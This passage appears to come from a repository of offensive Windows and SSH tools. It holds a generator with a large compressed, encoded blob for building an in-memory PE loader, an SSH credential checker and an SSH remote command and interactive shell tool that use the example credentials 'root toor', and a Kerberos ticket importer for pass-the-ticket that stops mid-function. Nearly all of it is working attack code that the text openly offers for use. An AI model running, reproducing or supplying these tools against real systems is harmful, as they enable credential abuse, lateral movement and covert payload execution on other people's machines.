@"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"; 91 | 92 | byte[] data2 = System.Convert.FromBase64String(source1compress_x64); 93 | byte[] decompressed2 = Decompress(data2); 94 | string source1_x64 = System.Text.Encoding.Default.GetString(decompressed2); 95 | 96 | byte[] AsBytes2 = File.ReadAllBytes(args[0].ToString()); 97 | byte[] compress2 = Compress(AsBytes2); 98 | string source2_x64 = Convert.ToBase64String(compress2); 99 | 100 | string source3_x64 = "\";\r\n }\r\n } "; 101 | StreamWriter sw2 = new StreamWriter(@"SharpPELoader_x64.cs"); 102 | sw2.Write(source1_x64 + source2_x64 + source3_x64); 103 | sw2.Close(); 104 | } 105 | Console.WriteLine("[+] All done."); 106 | } 107 | } 108 | 109 | public class PELoader 110 | { 111 | public struct IMAGE_DOS_HEADER 112 | { // DOS .EXE header 113 | public UInt16 e_magic; // Magic number 114 | public UInt16 e_cblp; // Bytes on last page of file 115 | public UInt16 e_cp; // Pages in file 116 | public UInt16 e_crlc; // Relocations 117 | public UInt16 e_cparhdr; // Size of header in paragraphs 118 | public UInt16 e_minalloc; // Minimum extra paragraphs needed 119 | public UInt16 e_maxalloc; // Maximum extra paragraphs needed 120 | public UInt16 e_ss; // Initial (relative) SS value 121 | public UInt16 e_sp; // Initial SP value 122 | public UInt16 e_csum; // Checksum 123 | public UInt16 e_ip; // Initial IP value 124 | public UInt16 e_cs; // Initial (relative) CS value 125 | public UInt16 e_lfarlc; // File address of relocation table 126 | public UInt16 e_ovno; // Overlay number 127 | public UInt16 e_res_0; // Reserved words 128 | public UInt16 e_res_1; // Reserved words 129 | public UInt16 e_res_2; // Reserved words 130 | public UInt16 e_res_3; // Reserved words 131 | public UInt16 e_oemid; // OEM identifier (for e_oeminfo) 132 | public UInt16 e_oeminfo; // OEM information; e_oemid specific 133 | public UInt16 e_res2_0; // Reserved words 134 | public UInt16 e_res2_1; // Reserved words 135 | public UInt16 e_res2_2; // Reserved words 136 | public UInt16 e_res2_3; // Reserved words 137 | public UInt16 e_res2_4; // Reserved words 138 | public UInt16 e_res2_5; // Reserved words 139 | public UInt16 e_res2_6; // Reserved words 140 | public UInt16 e_res2_7; // Reserved words 141 | public UInt16 e_res2_8; // Reserved words 142 | public UInt16 e_res2_9; // Reserved words 143 | public UInt32 e_lfanew; // File address of new exe header 144 | } 145 | 146 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 147 | public struct IMAGE_FILE_HEADER 148 | { 149 | public UInt16 Machine; 150 | public UInt16 NumberOfSections; 151 | public UInt32 TimeDateStamp; 152 | public UInt32 PointerToSymbolTable; 153 | public UInt32 NumberOfSymbols; 154 | public UInt16 SizeOfOptionalHeader; 155 | public UInt16 Characteristics; 156 | } 157 | 158 | /// 159 | /// The DOS header 160 | /// 161 | private IMAGE_DOS_HEADER dosHeader; 162 | /// 163 | /// The file header 164 | /// 165 | private IMAGE_FILE_HEADER fileHeader; 166 | public PELoader(string filePath) 167 | { 168 | // Read in the DLL or EXE and get the timestamp 169 | try 170 | { 171 | using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read)) 172 | { 173 | BinaryReader reader = new BinaryReader(stream); 174 | dosHeader = FromBinaryReader(reader); 175 | stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin); 176 | 177 | UInt32 ntHeadersSignature = reader.ReadUInt32(); 178 | fileHeader = FromBinaryReader(reader); 179 | } 180 | } 181 | catch(Exception e) 182 | { 183 | Console.WriteLine("[!] {0}", e.Message); 184 | Environment.Exit(0); 185 | } 186 | 187 | } 188 | 189 | public static T FromBinaryReader(BinaryReader reader) 190 | { 191 | // Read in a byte array 192 | byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T))); 193 | 194 | // Pin the managed memory while, copy it out the data, then unpin it 195 | GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned); 196 | T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T)); 197 | handle.Free(); 198 | 199 | return theStructure; 200 | } 201 | 202 | public bool Is32BitHeader 203 | { 204 | get 205 | { 206 | UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100; 207 | return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE; 208 | } 209 | } 210 | 211 | public IMAGE_FILE_HEADER FileHeader 212 | { 213 | get 214 | { 215 | return fileHeader; 216 | } 217 | } 218 | 219 | }//End Class 220 | 221 | } 222 | -------------------------------------------------------------------------------- /SharpSSHCheck_SSH.NET.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using System.IO; 4 | using Renci.SshNet; 5 | 6 | namespace SharpSSHCheck_SSH.NET 7 | { 8 | class Program 9 | { 10 | static void ShowUsage() 11 | { 12 | string Usage = @" 13 | SharpSSHCheck_SSH.NET 14 | Use to check the valid credential of SSH(Based on SSH.NET). 15 | Support password and privatekeyfile. 16 | Author:3gstudent 17 | Reference:https://github.com/sshnet/SSH.NET 18 | Note: 19 | You need to reference Renci.SshNet.dll. 20 | You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip 21 | Complie: 22 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll 23 | 24 | Usage: 25 | SharpSSHCheck_SSH.NET.exe 26 | : 27 | - plaintext 28 | - keyfile 29 | Eg: 30 | SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor 31 | SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa 32 | "; 33 | Console.WriteLine(Usage); 34 | } 35 | 36 | static void Main(string[] args) 37 | { 38 | if (args.Length != 5) 39 | ShowUsage(); 40 | else 41 | { 42 | try 43 | { 44 | String Host = args[0]; 45 | String Port = args[1]; 46 | String Username = args[3]; 47 | String Password = null; 48 | String Keypath = null; 49 | if (args[2] == "plaintext") 50 | { 51 | Password = args[4]; 52 | var connectionInfo = new PasswordConnectionInfo(Host, Int32.Parse(Port), Username, Password); 53 | connectionInfo.Timeout = TimeSpan.FromSeconds(10); 54 | var ssh = new SshClient(connectionInfo); 55 | ssh.Connect(); 56 | Console.WriteLine("[+] Valid: " + Username + " " + Password); 57 | ssh.Disconnect(); 58 | ssh.Dispose(); 59 | } 60 | else if (args[2] == "keyfile") 61 | { 62 | Keypath = args[4]; 63 | FileStream keyFileStream = File.OpenRead(Keypath); 64 | byte[] byData = new byte[40]; 65 | keyFileStream.Read(byData, 0, 40); 66 | string keyData = System.Text.Encoding.Default.GetString(byData); 67 | if (keyData.Contains("OPENSSH")) 68 | { 69 | Console.WriteLine("[!] Bad format of key file. You should use puttygen to convert the format."); 70 | System.Environment.Exit(0); 71 | } 72 | 73 | keyFileStream.Seek(0, SeekOrigin.Begin); 74 | var connectionInfo = new PrivateKeyConnectionInfo(Host, Int32.Parse(Port), Username, new PrivateKeyFile(keyFileStream)); 75 | connectionInfo.Timeout = TimeSpan.FromSeconds(10); 76 | 77 | var ssh = new SshClient(connectionInfo); 78 | ssh.Connect(); 79 | Console.WriteLine("[+] Valid: " + Username + " " + Keypath); 80 | ssh.Disconnect(); 81 | ssh.Dispose(); 82 | } 83 | else 84 | { 85 | Console.WriteLine("[!] Wrong parameter"); 86 | System.Environment.Exit(0); 87 | } 88 | } 89 | catch (Renci.SshNet.Common.SshException ex) 90 | { 91 | Console.WriteLine("[!] " + ex.Message); 92 | } 93 | catch (Exception exception) 94 | { 95 | Console.WriteLine("[!] " + exception.Message); 96 | } 97 | } 98 | } 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /SharpSSHRunCmd_SSH.NET.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using System.IO; 4 | using Renci.SshNet; 5 | 6 | namespace SharpSSHRunCmd_SSH.NET 7 | { 8 | class Program 9 | { 10 | static void ShowUsage() 11 | { 12 | string Usage = @" 13 | SharpSSHRunCmd_SSH.NET 14 | Remote command execution via SSH(Based on SSH.NET). 15 | Support password and privatekeyfile. 16 | Author:3gstudent 17 | Reference:https://github.com/sshnet/SSH.NET 18 | Note: 19 | You need to reference Renci.SshNet.dll. 20 | You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip 21 | Complie: 22 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll 23 | 24 | Usage: 25 | SharpSSHRunCmd_SSH.NET.exe 26 | : 27 | - plaintext 28 | - keyfile 29 | If the is shell,you will get an interactive shell. 30 | 31 | Eg: 32 | SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell 33 | SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps 34 | "; 35 | Console.WriteLine(Usage); 36 | } 37 | 38 | static void Main(string[] args) 39 | { 40 | if (args.Length != 6) 41 | ShowUsage(); 42 | else 43 | { 44 | try 45 | { 46 | String Host = args[0]; 47 | String Port = args[1]; 48 | String Username = args[3]; 49 | String Password = null; 50 | String Keypath = null; 51 | String cmd = args[5]; 52 | if (args[2] == "plaintext") 53 | { 54 | Password = args[4]; 55 | var connectionInfo = new PasswordConnectionInfo(Host, Int32.Parse(Port), Username, Password); 56 | connectionInfo.Timeout = TimeSpan.FromSeconds(10); 57 | var ssh = new SshClient(connectionInfo); 58 | ssh.Connect(); 59 | Console.WriteLine("[+] Valid: " + Username + " " + Password); 60 | if (cmd == "shell") 61 | while(true) 62 | { 63 | Console.Write("\n#"); 64 | cmd = Console.ReadLine(); 65 | if(cmd == "exit") 66 | { 67 | Console.Write("[*] Exit."); 68 | ssh.Disconnect(); 69 | ssh.Dispose(); 70 | System.Environment.Exit(0); 71 | } 72 | var runcmd = ssh.CreateCommand(cmd); 73 | var res = runcmd.Execute(); 74 | Console.Write(res); 75 | } 76 | else 77 | { 78 | var runcmd = ssh.CreateCommand(cmd); 79 | var res = runcmd.Execute(); 80 | Console.Write(res); 81 | ssh.Disconnect(); 82 | ssh.Dispose(); 83 | } 84 | } 85 | else if (args[2] == "keyfile") 86 | { 87 | Keypath = args[4]; 88 | FileStream keyFileStream = File.OpenRead(Keypath); 89 | byte[] byData = new byte[40]; 90 | keyFileStream.Read(byData, 0, 40); 91 | string keyData = System.Text.Encoding.Default.GetString(byData); 92 | if (keyData.Contains("OPENSSH")) 93 | { 94 | Console.WriteLine("[!] Bad format of key file. You should use puttygen to convert the format."); 95 | System.Environment.Exit(0); 96 | } 97 | 98 | keyFileStream.Seek(0, SeekOrigin.Begin); 99 | var connectionInfo = new PrivateKeyConnectionInfo(Host, Int32.Parse(Port), Username, new PrivateKeyFile(keyFileStream)); 100 | connectionInfo.Timeout = TimeSpan.FromSeconds(10); 101 | 102 | var ssh = new SshClient(connectionInfo); 103 | ssh.Connect(); 104 | Console.WriteLine("[+] Valid: " + Username + " " + Keypath); 105 | if (cmd == "shell") 106 | while(true) 107 | { 108 | Console.Write("\n#"); 109 | cmd = Console.ReadLine(); 110 | if(cmd == "exit") 111 | { 112 | Console.Write("[*] Exit."); 113 | ssh.Disconnect(); 114 | ssh.Dispose(); 115 | System.Environment.Exit(0); 116 | } 117 | var runcmd = ssh.CreateCommand(cmd); 118 | var res = runcmd.Execute(); 119 | Console.Write(res); 120 | } 121 | else 122 | { 123 | var runcmd = ssh.CreateCommand(cmd); 124 | var res = runcmd.Execute(); 125 | Console.Write(res); 126 | ssh.Disconnect(); 127 | ssh.Dispose(); 128 | } 129 | } 130 | else 131 | { 132 | Console.WriteLine("[!] Wrong parameter"); 133 | System.Environment.Exit(0); 134 | } 135 | } 136 | catch (Renci.SshNet.Common.SshException ex) 137 | { 138 | Console.WriteLine("[!] " + ex.Message); 139 | } 140 | catch (Exception exception) 141 | { 142 | Console.WriteLine("[!] " + exception.Message); 143 | } 144 | } 145 | } 146 | } 147 | } 148 | -------------------------------------------------------------------------------- /SharpTGTImporter.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.ComponentModel; 3 | using System.Runtime.InteropServices; 4 | using System.IO; 5 | namespace kerberos 6 | { 7 | public class TGTImporter 8 | { 9 | [DllImport("secur32.dll", SetLastError = false)] 10 | private static extern int LsaConnectUntrusted([Out] out IntPtr LsaHandle); 11 | [DllImport("secur32.dll", SetLastError = false)] 12 | private static extern int LsaDeregisterLogonProcess([In] IntPtr LsaHandle); 13 | [DllImport("secur32.dll", SetLastError = false)] 14 | private static extern int LsaLookupAuthenticationPackage([In] IntPtr LsaHandle, [In] ref LSA_STRING PackageName, [Out] out int AuthenticationPackage); 15 | [DllImport("secur32.dll", SetLastError = false)] 16 | private static extern int LsaCallAuthenticationPackage(IntPtr LsaHandle, int AuthenticationPackage, IntPtr ProtocolSubmitBuffer, int SubmitBufferLength, out IntPtr ProtocolReturnBuffer, out int ReturnBufferLength, out int ProtocolStatus); 17 | [DllImport("advapi32.dll", SetLastError = false)] 18 | private static extern int LsaNtStatusToWinError(int StatusCode); 19 | private enum KERB_PROTOCOL_MESSAGE_TYPE : uint 20 | { 21 | KerbSubmitTicketMessage = 21, 22 | } 23 | [StructLayout(LayoutKind.Sequential)] 24 | private struct LSA_STRING 25 | { 26 | public UInt16 Length; 27 | public UInt16 MaximumLength; 28 | public String Buffer; 29 | } 30 | [StructLayout(LayoutKind.Sequential)] 31 | private struct KERB_CRYPTO_KEY32 32 | { 33 | public int KeyType; 34 | public int Length; 35 | public int Offset; 36 | } 37 | [StructLayout(LayoutKind.Sequential)] 38 | private struct LUID 39 | { 40 | int LowPart; 41 | int HighPart; 42 | } 43 | [StructLayout(LayoutKind.Sequential)] 44 | private struct KERB_SUBMIT_TKT_REQUEST 45 | { 46 | public KERB_PROTOCOL_MESSAGE_TYPE MessageType; 47 | public LUID LogonId; 48 | public int Flags; 49 | public KERB_CRYPTO_KEY32 Key; // key to decrypt KERB_CRED 50 | public int KerbCredSize; 51 | public int KerbCredOffset; 52 | } 53 | public static void ImportTGT(byte[] ticket) 54 | { 55 | IntPtr LsaHandle = IntPtr.Zero; 56 | int AuthenticationPackage; 57 | int ntstatus, ProtocalStatus; 58 | 59 | ntstatus = LsaConnectUntrusted(out LsaHandle); 60 | if (ntstatus != 0) 61 | throw new Win32Exception(LsaNtStatusToWinError(ntstatus)); 62 | IntPtr inputBuffer = IntPtr.Zero; 63 | IntPtr ProtocolReturnBuffer; 64 | int ReturnBufferLength; 65 | try 66 | { 67 | LSA_STRING LSAString; 68 | string Name = "kerberos"; 69 | LSAString.Length = (ushort)Name.Length; 70 | LSAString.MaximumLength = (ushort)(Name.Length + 1); 71 | LSAString.Buffer = Name; 72 | ntstatus = LsaLookupAuthenticationPackage(LsaHandle, ref LSAString, out AuthenticationPackage); 73 | if (ntstatus != 0) 74 | throw new Win32Exception(LsaNtStatusToWinError(ntstatus)); 75 | KERB_SUBMIT_TKT_REQUEST request = new KERB_SUBMIT_TKT_REQUEST(); 76 | request.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage; 77 | request.KerbCredSize = ticket.Length; 78 | request.KerbCredOffset = Marshal.SizeOf(typeof(KERB_SUBMIT_TKT_REQUEST)); 79 | 80 | int inputBufferSize = Marshal.SizeOf(typeof(KERB_SUBMIT_TKT_REQUEST)) + ticket.Length; 81 | inputBuffer = Marshal.AllocHGlobal(inputBufferSize); 82 | Marshal.StructureToPtr(request, inputBuffer, false); 83 | Marshal.Copy(ticket, 0, new IntPtr(inputBuffer.ToInt64() + request.KerbCredOffset), ticket.Length); 84 | ntstatus = LsaCallAuthenticationPackage(LsaHandle, AuthenticationPackage, inputBuffer, inputBufferSize, out ProtocolReturnBuffer, out ReturnBufferLength, out ProtocalStatus); 85 | if (ntstatus != 0) 86 | throw new Win32Exception(LsaNtStatusToWinError(ntstatus)); 87 | if (ProtocalStatus != 0) 88 | throw new Win32Exception(LsaNtStatusToWinError(ProtocalStatus)); 89 | } 90 | finally 91 | { 92 | if (inputBuffer != IntPtr.Zero) 93 | Marshal.FreeHGlobal(inputBuffer); 94 | LsaDeregisterLogonProcess(LsaHandle); 95 